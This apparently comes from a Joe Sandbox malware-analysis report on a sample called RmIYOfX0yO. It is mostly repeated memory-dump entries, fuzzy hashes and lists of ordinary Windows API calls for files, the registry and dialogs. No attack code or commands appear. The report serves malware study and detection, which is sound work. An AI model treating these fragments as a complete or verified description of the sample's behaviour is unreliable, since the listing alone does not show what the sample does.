                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$AttributesCreate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 415043291-0
                                                                                                                    • Opcode ID: 7f22f31ca84e25cf3c35cca7fc28e1469c604482c982d9b12555b4894eb7b1e0
                                                                                                                    • Instruction ID: e98dd403a5e5432679a9d4e257ef455d3d6759c2e5ed6cf280caa05d5291d686
                                                                                                                    • Opcode Fuzzy Hash: 7f22f31ca84e25cf3c35cca7fc28e1469c604482c982d9b12555b4894eb7b1e0
                                                                                                                    • Instruction Fuzzy Hash: B3D09E71654601EFEF098F20DF16F2E7AA2EB84B00F11562CB682940E0DA7158199B19
                                                                                                                    APIs
                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,00405938,?,?,00000000,00405B0E,?,?,?,?), ref: 00405D38
                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D4C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AttributesFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3188754299-0
                                                                                                                    • Opcode ID: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                                                                                                                    • Instruction ID: bbac5bc73aa77dea78574471440e90d8105817861fa72b5948562f5081259be0
                                                                                                                    • Opcode Fuzzy Hash: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                                                                                                                    • Instruction Fuzzy Hash: 1CD0C976504520ABC2112728AE0C89BBB55EB54371B028B35FAA9A22B0CB304C568A98
                                                                                                                    APIs
                                                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,004033A9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035E2), ref: 00405834
                                                                                                                    • GetLastError.KERNEL32 ref: 00405842
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1375471231-0
                                                                                                                    • Opcode ID: 90cc4c9737d43430731b600de694bcf2d45feac9894761d90dfe22e9228b7257
                                                                                                                    • Instruction ID: 106bcc9dbfec6d9c4c73fbe0ebad0997e3226ea8ec62ae9f19e78208b048f617
                                                                                                                    • Opcode Fuzzy Hash: 90cc4c9737d43430731b600de694bcf2d45feac9894761d90dfe22e9228b7257
                                                                                                                    • Instruction Fuzzy Hash: C9C04C31204A019AD6606B209F09B177954EB50741F1184396946E00A0DB348425DE2D
                                                                                                                    APIs
                                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004022D4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: PrivateProfileStringWrite
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 390214022-0
                                                                                                                    • Opcode ID: 60b22f5a932472850941fcf3cf4ac9c96d80a2104eac916f2d4d26c3cfc5b4d4
                                                                                                                    • Instruction ID: 9c0f32427e9d9ad9a827debec1b0d32512713181f08a0e22f3c826aa7fb996c6
                                                                                                                    • Opcode Fuzzy Hash: 60b22f5a932472850941fcf3cf4ac9c96d80a2104eac916f2d4d26c3cfc5b4d4
                                                                                                                    • Instruction Fuzzy Hash: 90E04F319001246ADB113EF10E8ED7F31695B40314B1405BFB551B66C6D9FC0D4246A9
                                                                                                                    APIs
                                                                                                                    • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,?,0040CEF0,004032EF,0040CEF0,?,00414EF0,00004000,?,00000000,00403119,00000004), ref: 00405E1E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileWrite
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3934441357-0
                                                                                                                    • Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                                                                                    • Instruction ID: 23ec5f7379bf279edb3dbb3262258d5736cfdadd2d5b14d2449b9c6e52f850f2
                                                                                                                    • Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                                                                                    • Instruction Fuzzy Hash: 4DE08C3224021EABCF109F50CC08EEB3B6CEB00360F044432FA99E2080D230EA209BE4
                                                                                                                    APIs
                                                                                                                    • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Open
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 71445658-0
                                                                                                                    • Opcode ID: 6de8d722f9b5cde2e8321ff20ccbb9f3bd30598b393325d5ca99ac671e434b38
                                                                                                                    • Instruction ID: 027cd1837f043f16bcd3791d2c18ee9a5769249626570c171517a7e702d59ee3
                                                                                                                    • Opcode Fuzzy Hash: 6de8d722f9b5cde2e8321ff20ccbb9f3bd30598b393325d5ca99ac671e434b38
                                                                                                                    • Instruction Fuzzy Hash: 17E0EC76254108BFDB10EFA9EE4BFE97BECAB44704F008435BA09E70E1C674E5509B69
                                                                                                                    APIs
                                                                                                                    • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,0040336B,?,?,0040326F,00414EF0,00004000,?,00000000,00403119), ref: 00405DEF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileRead
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2738559852-0
                                                                                                                    • Opcode ID: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
                                                                                                                    • Instruction ID: 619b4f5876fe922fe119770d1c4b6382a551d6d1c0a67235faeb4c306daddfa0
                                                                                                                    • Opcode Fuzzy Hash: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
                                                                                                                    • Instruction Fuzzy Hash: BAE08C3220021AABCF10AF90CC04AEB3B6CEB083A0F004833F951E3140D230E9618BE4
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004042A5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3850602802-0
                                                                                                                    • Opcode ID: 5756958af50dd38891c3069a2751d27f69ae340bed3483b9d05a16c22411fa1f
                                                                                                                    • Instruction ID: 2f2862f802f4bb8c259b254183006bf3f0de574643f6f04ef9dece27a841d158
                                                                                                                    • Opcode Fuzzy Hash: 5756958af50dd38891c3069a2751d27f69ae340bed3483b9d05a16c22411fa1f
                                                                                                                    • Instruction Fuzzy Hash: 24C04C71740600BBDA208B509E45F1677546754740F1448697740A50E0C674E410D62D
                                                                                                                    APIs
                                                                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040306C,?), ref: 0040337C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FilePointer
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 973152223-0
                                                                                                                    • Opcode ID: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                                                                                                    • Instruction ID: 2811e774c662cae59278f25d6ecae3b2a92cb5be3fe339fd2c15133e28e6e099
                                                                                                                    • Opcode Fuzzy Hash: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                                                                                                    • Instruction Fuzzy Hash: D0B01231140300BFDA214F00DF09F057B21AB90700F10C034B344380F086711035EB4D
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000028,?,00000001,004040A8), ref: 0040428A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3850602802-0
                                                                                                                    • Opcode ID: 4fda07dd220d348ff9e627888b9912082cf8e79b7c773bcb1828ccca34d8a7b3
                                                                                                                    • Instruction ID: 7863800e542b6cbc8ec812c2a21dbba0b6cde8a84852b126545aa60b8f7f929b
                                                                                                                    • Opcode Fuzzy Hash: 4fda07dd220d348ff9e627888b9912082cf8e79b7c773bcb1828ccca34d8a7b3
                                                                                                                    • Instruction Fuzzy Hash: 13B01235285A00FBDE214B00EE09F457E62F76CB01F008478B340240F0CAB300B1DF19
                                                                                                                    APIs
                                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,00404041), ref: 00404273
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CallbackDispatcherUser
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2492992576-0
                                                                                                                    • Opcode ID: c0b3a243f11644889afe8cb27eda9c0353b0d621d2840f40823c674b46be75ab
                                                                                                                    • Instruction ID: 08295bde0fd8e02eb16c20732bdcb1eb6333efd9321479dd2e2322931d05c33c
                                                                                                                    • Opcode Fuzzy Hash: c0b3a243f11644889afe8cb27eda9c0353b0d621d2840f40823c674b46be75ab
                                                                                                                    • Instruction Fuzzy Hash: ADA001B6644500ABCE129F90EF49D0ABB72EBE4B02B518579A285900348A365961FB59
                                                                                                                    APIs
                                                                                                                    • GetDlgItem.USER32(?,000003F9), ref: 00404C76
                                                                                                                    • GetDlgItem.USER32(?,00000408), ref: 00404C81
                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404CCB
                                                                                                                    • LoadBitmapW.USER32(0000006E), ref: 00404CDE
                                                                                                                    • SetWindowLongW.USER32(?,000000FC,00405256), ref: 00404CF7
                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D0B
                                                                                                                    • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D1D
                                                                                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 00404D33
                                                                                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D3F
                                                                                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D51
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00404D54
                                                                                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D7F
                                                                                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D8B
                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E21
                                                                                                                    • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E4C
                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E60
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00404E8F
                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404E9D
                                                                                                                    • ShowWindow.USER32(?,00000005), ref: 00404EAE
                                                                                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FAB
                                                                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405010
                                                                                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405025
                                                                                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405049
                                                                                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405069
